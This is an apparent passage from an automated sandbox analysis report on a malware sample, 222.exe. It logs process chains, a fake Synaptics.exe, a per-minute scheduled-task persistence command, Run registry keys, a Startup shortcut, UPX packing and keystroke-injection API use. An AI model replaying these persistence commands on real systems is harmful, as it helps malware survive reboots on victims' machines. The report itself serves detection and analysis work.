                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Users\user\Desktop\222.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\222.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: 222.exe Virustotal: Detection: 85%
                              Source: 222.exe ReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\222.exe File read: C:\Users\user\Desktop\222.exe
                              Source: unknown Process created: C:\Users\user\Desktop\222.exe "C:\Users\user\Desktop\222.exe"
                              Source: C:\Users\user\Desktop\222.exe Process created: C:\Users\user\Desktop\._cache_222.exe "C:\Users\user\Desktop\._cache_222.exe"
                              Source: C:\Users\user\Desktop\222.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_222.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\._cache_222.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                              Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 10496
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                              Source: C:\Users\user\Desktop\222.exe Section loaded: apphelp.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: wininet.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: wsock32.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: netapi32.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: textshaping.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: propsys.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: twext.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: appresolver.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: bcp47langs.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: slc.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: userenv.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: sppc.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: policymanager.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: msvcp110_win.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: ntshrui.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: windows.fileexplorer.common.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: iertutil.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: srvcli.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: cscapi.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: netutils.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: shacct.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: idstore.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: twinapi.appcore.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: samlib.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: starttiledata.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: acppage.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: sfc.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: msi.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: aepic.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: sfc_os.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: ntmarta.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: wlidprov.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: samcli.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: provsvc.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: edputil.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: urlmon.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: wintypes.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: ntmarta.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: twext.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: ntshrui.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: starttiledata.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: acppage.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: sfc.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: msi.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: aepic.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\222.exe Section loaded: sfc_os.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: apphelp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: iphlpapi.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: mpr.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: userenv.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: wininet.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: winmm.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: wsock32.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: propsys.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: wbemcomn.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: napinsp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: pnrpnsp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: wshbth.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: nlaapi.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: mswsock.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: dnsapi.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: winrnr.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: fwpuclnt.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: rasadhlp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: amsi.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: sxs.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: napinsp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: pnrpnsp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: wshbth.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: nlaapi.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: winrnr.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: fwpuclnt.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: linkinfo.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: ntshrui.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: srvcli.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: cscapi.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: napinsp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: pnrpnsp.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: wshbth.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: nlaapi.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: winrnr.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Section loaded: fwpuclnt.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: apphelp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: textshaping.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: profapi.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: ntmarta.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: iertutil.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: sspicli.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: ondemandconnroutehelper.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: winhttp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: iphlpapi.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: mswsock.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: winnsi.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: urlmon.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: srvcli.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: netutils.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: dnsapi.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: rasadhlp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: fwpuclnt.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: schannel.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: napinsp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: pnrpnsp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: wshbth.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: nlaapi.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: winrnr.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: mskeyprotect.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: ntasn1.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: msasn1.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\222.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: HBMQLS.lnk.2.dr LNK file: ..\..\..\..\..\Windata\EWZJGF.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exe File written: C:\Users\user\AppData\Local\Temp\G5hJM8Z.ini
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                              Source: 222.exe Static file information: File size 1723904 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_008CB0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_008CB0C0
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_00768D99 push edi; retn 0000h 2_2_00768D9B
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_00768F0E push F7FFFFFFh; retn 0000h 2_2_00768F13
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_00787795 push ecx; ret 2_2_007877A8
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 3_2_2171C220 pushfd ; ret 3_2_2171C221
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_00448D99 push edi; retn 0000h 9_2_00448D9B
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_00448F0E push F7FFFFFFh; retn 0000h 9_2_00448F13
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_00467795 push ecx; ret 9_2_004677A8
                              Source: initial sample Static PE information: section name: UPX0
                              Source: initial sample Static PE information: section name: UPX1

                              Persistence and Installation Behavior

                              Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Documents\EEGWXUHVUG\~$cache1
                              Source: C:\Users\user\Desktop\222.exe File created: C:\ProgramData\Synaptics\RCX6FEC.tmp
                              Source: C:\Users\user\Desktop\222.exe File created: C:\Users\user\Desktop\._cache_222.exe
                              Source: C:\Users\user\Desktop\222.exe File created: C:\ProgramData\Synaptics\Synaptics.exe
                              Source: C:\Users\user\Desktop\._cache_222.exe File created: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe

                              Boot Survival

                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_222.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HBMQLS.lnk
                              Source: C:\Users\user\Desktop\222.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                              Source: C:\Users\user\Desktop\._cache_222.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HBMQLS

                              Hooking and other Techniques for Hiding and Protection

                              Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon (2112).png
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0077F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0077F78E
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007C7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_007C7F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_0045F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_0045F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_004A7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_004A7F0E
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00781E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00781E5A
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Users\user\Desktop\222.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\._cache_222.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\._cache_222.exe Window / User API: threadDelayed 5206
                              Source: C:\Users\user\Desktop\._cache_222.exe Window / User API: foregroundWindowGot 1596
                              Source: C:\Users\user\Desktop\._cache_222.exe API coverage: 6.3 %
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe API coverage: 3.7 %
                              Source: C:\Users\user\Desktop\._cache_222.exe TID: 5304 Thread sleep time: -52060s >= -30000s
